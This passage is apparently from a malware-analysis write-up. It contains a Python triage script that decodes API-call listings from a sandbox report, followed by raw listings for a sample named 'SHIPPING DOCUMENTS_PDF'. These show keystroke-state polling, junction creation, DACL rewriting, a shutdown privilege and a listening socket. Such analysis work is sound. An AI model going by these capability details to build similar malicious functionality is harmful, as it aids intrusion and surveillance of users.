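ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x00040000: "WRITE_DAC", 0x00020000: "READ_CONTROL"}
DESKTOP = {**ACCESS, 0x00000080: "DESKTOP_WRITEOBJECTS", 0x00000001: "DESKTOP_READOBJECTS"}
FSCTL_SET_REPARSE_POINT = 0x000900A4
DACL_SECURITY_INFORMATION = 0x00000004


@dataclass
class Call:
    api: str
    module: str
    args: list  # int for recovered values, str for literals, None for '?'
    ref: int
    subcall: Optional[int] = None


def parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) & 0xFFFFFFFF if re.fullmatch(r"-?[0-9A-F]{8}", tok) else tok


def parse_listing(text: str) -> list:
    """Turn the bullet lines of one function's 'APIs' block into Call records."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.search(line)
        if m:
            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
            sub = int(m["sub"], 16) if m["sub"] else None
            calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def decode_flags(value: int, table: dict) -> list:
    """Name every known bit set in value; unknown leftover bits stay as hex."""
    names, rest = [], value
    for bit, name in table.items():
        if (value & bit) == bit:
            names.append(name)
            rest &= ~bit
    return names + ([hex(rest)] if rest else [])


def decode_ioctl(code: int) -> dict:
    """Split a CTL_CODE into device type, function number, method and access."""
    return {"device": code >> 16, "function": (code >> 2) & 0xFFF,
            "method": code & 3, "access": (code >> 14) & 3}


def arg_int(call: Call, idx: int) -> int:
    """Recovered integer argument idx, or 0 when absent, a literal or '?'."""
    return call.args[idx] if idx < len(call.args) and isinstance(call.args[idx], int) else 0


def triage(calls: list) -> list:
    """Flag call patterns in one function's listing that deserve a closer look."""
    findings = []
    opened_reparse = any(c.api == "CreateFileW" and arg_int(c, 5) & 0x00200000 for c in calls)
    set_reparse = any(c.api == "DeviceIoControl" and arg_int(c, 1) == FSCTL_SET_REPARSE_POINT
                      for c in calls)
    if opened_reparse and set_reparse:
        findings.append("FSCTL_SET_REPARSE_POINT on a handle opened with "
                        "FILE_FLAG_OPEN_REPARSE_POINT: reparse point (junction) creation")
    for c in calls:
        idx = {"OpenWindowStationW": 2, "OpenDesktopW": 3}.get(c.api)
        if idx is not None and arg_int(c, idx) & 0x00040000:
            findings.append(f"{c.api} requests WRITE_DAC: DACL of the object will be rewritten")
        if c.api == "SetUserObjectSecurity" and arg_int(c, 1) == DACL_SECURITY_INFORMATION:
            findings.append("SetUserObjectSecurity writes a new DACL")
    return findings


# Constructed input: lines copied verbatim from the report's listings.
REPARSE_LISTING = """\
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BBA20F
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00BBA26E
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00BBA293
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00BBA323
"""
WINSTA_LISTING = """\
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00BA83CD
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00BA840A
  • Part of subcall function 00BA81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00BA8309), ref: 00BA81E0
"""
DACL_LISTING = """\
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00BA7E3D
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00BA7E77
"""

if __name__ == "__main__":
    for name, text in (("reparse", REPARSE_LISTING), ("winsta", WINSTA_LISTING), ("dacl", DACL_LISTING)):
        print(name, [c.api for c in parse_listing(text)], triage(parse_listing(text)))
    cf = parse_listing(REPARSE_LISTING)[2]
    print(decode_flags(cf.args[1], ACCESS), decode_flags(cf.args[5], FILE_FLAGS), decode_ioctl(FSCTL_SET_REPARSE_POINT))
```

Decoded this way, 02200000 is FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT and 000900A4 is FSCTL_SET_REPARSE_POINT (device 9, function 41, METHOD_BUFFERED), which together with the "\??\%s" string is how a directory junction is written. The winsta0/default sequence with exactly READ_CONTROL | WRITE_DAC on the window station and READ_CONTROL | WRITE_DAC | DESKTOP_READOBJECTS | DESKTOP_WRITEOBJECTS on the desktop is the groundwork for starting a process under another user's token, as in Microsoft's "Starting an Interactive Client Process" sample. A static listing only shows the capability is present in the runtime; whether the script reaches this code must be confirmed from the behaviour sections of the report.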
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                    • API String ID: 0-4052911093
                                                                                    • Opcode ID: 6b08768993bf93741164d4a00ee670c2b7c02c53be94055fb3cc9d9378044832
                                                                                    • Instruction ID: 84a8ee8aa1c8e43305f77563b0fe57bb20a7b475170dc2fca9f2c872b165a24e
                                                                                    • Opcode Fuzzy Hash: 6b08768993bf93741164d4a00ee670c2b7c02c53be94055fb3cc9d9378044832
                                                                                    • Instruction Fuzzy Hash: 58726D71E04219DBDF64CF59C8807AEB7F5FF49310F1485AAE849EB291EB349981CB90
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?), ref: 00BB0097
                                                                                    • SetKeyboardState.USER32(?), ref: 00BB0102
                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00BB0122
                                                                                    • GetKeyState.USER32(000000A0), ref: 00BB0139
                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00BB0168
                                                                                    • GetKeyState.USER32(000000A1), ref: 00BB0179
                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00BB01A5
                                                                                    • GetKeyState.USER32(00000011), ref: 00BB01B3
                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00BB01DC
                                                                                    • GetKeyState.USER32(00000012), ref: 00BB01EA
                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00BB0213
                                                                                    • GetKeyState.USER32(0000005B), ref: 00BB0221
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: State$Async$Keyboard
                                                                                    • String ID:
                                                                                    • API String ID: 541375521-0
                                                                                    • Opcode ID: d7ed342c22d929227f56d9a5549e6bdea7fad7563b90d89e4cce48d2a852922d
                                                                                    • Instruction ID: 9ac8b69e79fa9050fca53a48fb46d632d329b64a082fa2d3a9063ef13bd1ae64
                                                                                    • Opcode Fuzzy Hash: d7ed342c22d929227f56d9a5549e6bdea7fad7563b90d89e4cce48d2a852922d
                                                                                    • Instruction Fuzzy Hash: 4651B4209157882BFB35FBA488547FBBFF4DF11380F4845DA99C2561C2EAE49A8CC761
                                                                                    APIs
                                                                                      • Part of subcall function 00BD0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCFDAD,?,?), ref: 00BD0E31
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BD04AC
                                                                                      • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                                                      • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00BD054B
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00BD05E3
                                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00BD0822
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BD082F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1240663315-0
                                                                                    • Opcode ID: 84454fea0a35c78c6543d1a9e751e85cc0173bd3a1786cdab046c79a40cccfe8
                                                                                    • Instruction ID: 13fd8f1d7e294898f81d35aee0c39ad15f295d17b151571c49da70359717f208
                                                                                    • Opcode Fuzzy Hash: 84454fea0a35c78c6543d1a9e751e85cc0173bd3a1786cdab046c79a40cccfe8
                                                                                    • Instruction Fuzzy Hash: F4E14F71604205AFCB14EF24C895E6ABBE4FF89714F0485ADF84ADB361DA31ED05CB52
                                                                                    APIs
                                                                                      • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                                                      • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                                                    • CoInitialize.OLE32 ref: 00BC8403
                                                                                    • CoUninitialize.OLE32 ref: 00BC840E
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00BE2BEC,?), ref: 00BC846E
                                                                                    • IIDFromString.OLE32(?,?), ref: 00BC84E1
                                                                                    • VariantInit.OLEAUT32(?), ref: 00BC857B
                                                                                    • VariantClear.OLEAUT32(?), ref: 00BC85DC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                    • API String ID: 834269672-1287834457
                                                                                    • Opcode ID: 8622fee552ee16d9cb9957ee2b84df3d09f39853ef841a62ad2748a69bbf36fb
                                                                                    • Instruction ID: 0a915e8be267b752a2eacfb08a3b77c3d863ad8e05e4b83acbf5ab526cb30b90
                                                                                    • Opcode Fuzzy Hash: 8622fee552ee16d9cb9957ee2b84df3d09f39853ef841a62ad2748a69bbf36fb
                                                                                    • Instruction Fuzzy Hash: 53618970608312AFC714DF64C889F6AB7E8AF49754F04489DF9869B291DB70ED48CB92
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1737998785-0
                                                                                    • Opcode ID: 4bcacbc6ed719bf86f51660984f9b9fb871160939af4243db2300cbdca7287ac
                                                                                    • Instruction ID: dad28a48c56a6702af1b9da038ba772170d9931429192221b6f6606a6cf39fc1
                                                                                    • Opcode Fuzzy Hash: 4bcacbc6ed719bf86f51660984f9b9fb871160939af4243db2300cbdca7287ac
                                                                                    • Instruction Fuzzy Hash: 89218D352052119FDB10AF24DC69F6EBBE8EF55751F1480AAF9469B2A1EB30ED00CB54
                                                                                    APIs
                                                                                      • Part of subcall function 00B54750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B54743,?,?,00B537AE,?), ref: 00B54770
                                                                                      • Part of subcall function 00BB4A31: GetFileAttributesW.KERNEL32(?,00BB370B), ref: 00BB4A32
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00BB38A3
                                                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00BB394B
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00BB395E
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00BB397B
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BB399D
                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00BB39B9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 4002782344-1173974218
                                                                                    • Opcode ID: 97bfaeb8ab904f9c37555ef8558390770b12d1f4a872a6be38295ae904940282
                                                                                    • Instruction ID: 03b29317e2158dfe91649dd163af7becab5e3952c603261418037b120a5a9c02
                                                                                    • Opcode Fuzzy Hash: 97bfaeb8ab904f9c37555ef8558390770b12d1f4a872a6be38295ae904940282
                                                                                    • Instruction Fuzzy Hash: 43516D3190514DABCB11EBA0D992AFDB7F9AF15301F6000E9E846771A1EFA16F0DCB61
                                                                                    APIs
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00BBF440
                                                                                    • Sleep.KERNEL32(0000000A), ref: 00BBF470
                                                                                    • _wcscmp.LIBCMT ref: 00BBF484
                                                                                    • _wcscmp.LIBCMT ref: 00BBF49F
                                                                                    • FindNextFileW.KERNEL32(?,?), ref: 00BBF53D
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BBF553
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                    • String ID: *.*
                                                                                    • API String ID: 713712311-438819550
                                                                                    • Opcode ID: 3b4ea5445da8e5098b201b68c88803b6319037ddbd6a9e073aa223da9d71d5c0
                                                                                    • Instruction ID: 39e7682a34cf8e2dd4a0fbd717266b625db8158353a298b8e5de050756c024ff
                                                                                    • Opcode Fuzzy Hash: 3b4ea5445da8e5098b201b68c88803b6319037ddbd6a9e073aa223da9d71d5c0
                                                                                    • Instruction Fuzzy Hash: 45417C7190421AAFCF24EF64DC55AFEBBF4FF15310F1444A6E815A32A0EB709A58CB50
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID:
                                                                                    • API String ID: 4104443479-0
                                                                                    • Opcode ID: 9fb15db7f7a9db1d1eb3bf4bc1e381cd5d5e5b9b8d96375e62a1850fab7ba580
                                                                                    • Instruction ID: 7e8cfcc25bf7b14118c29c2f057160f94d2a41a0679701a500d877631038095e
                                                                                    • Opcode Fuzzy Hash: 9fb15db7f7a9db1d1eb3bf4bc1e381cd5d5e5b9b8d96375e62a1850fab7ba580
                                                                                    • Instruction Fuzzy Hash: 75128A70A04609DFDF14DFA5D981AAEB7F5FF48300F1085A9E806A7291EB39AD24CB50
                                                                                    APIs
                                                                                      • Part of subcall function 00B54750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B54743,?,?,00B537AE,?), ref: 00B54770
                                                                                      • Part of subcall function 00BB4A31: GetFileAttributesW.KERNEL32(?,00BB370B), ref: 00BB4A32
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00BB3B89
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00BB3BD9
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BB3BEA
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BB3C01
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BB3C0A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 2649000838-1173974218
                                                                                    • Opcode ID: d5165cd81faf422f3720027c3ac8eaf22050d7ac550679f03c1f4bb9b5d4637f
                                                                                    • Instruction ID: 1fa729681ff33cb531da707f29e828240684d264959c0e2476244a0a3ffa2f4c
                                                                                    • Opcode Fuzzy Hash: d5165cd81faf422f3720027c3ac8eaf22050d7ac550679f03c1f4bb9b5d4637f
                                                                                    • Instruction Fuzzy Hash: A2317E310493859FC201EB64D8A19FFBBE8AE91315F404EADF8D5931A1EF219A0DC763
                                                                                    APIs
                                                                                      • Part of subcall function 00BA87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BA882B
                                                                                      • Part of subcall function 00BA87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BA8858
                                                                                      • Part of subcall function 00BA87E1: GetLastError.KERNEL32 ref: 00BA8865
                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00BB51F9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                    • String ID: $@$SeShutdownPrivilege
                                                                                    • API String ID: 2234035333-194228
                                                                                    • Opcode ID: b85426e5413f449b404dc6253a61313d041e753a0b38118135ef8b57358cbc16
                                                                                    • Instruction ID: 5e8e2cb78a9abf6a0d26c51efe020c5d271d9bd2741385e7479ee4e63180f73d
                                                                                    • Opcode Fuzzy Hash: b85426e5413f449b404dc6253a61313d041e753a0b38118135ef8b57358cbc16
                                                                                    • Instruction Fuzzy Hash: E401F731697A166FE7386668AC9BFFAB3D8DB05740F2404A1F943E20D2EAD11C0085A2
                                                                                    APIs
                                                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00BC62DC
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00BC62EB
                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00BC6307
                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00BC6316
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00BC6330
                                                                                    • closesocket.WSOCK32(00000000), ref: 00BC6344
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                    • String ID:
                                                                                    • API String ID: 1279440585-0
                                                                                    • Opcode ID: c2c4517c93e9f8fcbe9d1e9ac2a3e89f8b1bdf0432e8e9e2155baecaebc9c935
                                                                                    • Instruction ID: cd9eb14f05561dbbac1bdf68547023fbed6bc53886879386fbc3858c1662b4b3
                                                                                    • Opcode Fuzzy Hash: c2c4517c93e9f8fcbe9d1e9ac2a3e89f8b1bdf0432e8e9e2155baecaebc9c935
                                                                                    • Instruction Fuzzy Hash: 78219E756002059FCB10EF68C885F7EB7E9EF89721F1481A9E816A72D1DB70AD05CB51
                                                                                    APIs
                                                                                      • Part of subcall function 00B70DB6: std::exception::exception.LIBCMT ref: 00B70DEC
                                                                                      • Part of subcall function 00B70DB6: __CxxThrowException@8.LIBCMT ref: 00B70E01
                                                                                    • _memmove.LIBCMT ref: 00BA0258
                                                                                    • _memmove.LIBCMT ref: 00BA036D
                                                                                    • _memmove.LIBCMT ref: 00BA0414
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 1300846289-0
                                                                                    • Opcode ID: 35195a8139b77f7473afc520cb2438bb517044456ef35081f45c26b31425dcdb
                                                                                    • Instruction ID: 8cf37b27674f3578ca0768e48c20b5b96a662a3f9aa7198e547ab7b9d896aee8
                                                                                    • Opcode Fuzzy Hash: 35195a8139b77f7473afc520cb2438bb517044456ef35081f45c26b31425dcdb
                                                                                    • Instruction Fuzzy Hash: AE02C0B0A14209DBCF14EF64D981AAE7BF5EF49300F5480E9E80AEB251EB35DD54CB91
                                                                                    APIs
                                                                                      • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00B519FA
                                                                                    • GetSysColor.USER32(0000000F), ref: 00B51A4E
                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00B51A61
                                                                                      • Part of subcall function 00B51290: DefDlgProcW.USER32(?,00000020,?), ref: 00B512D8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
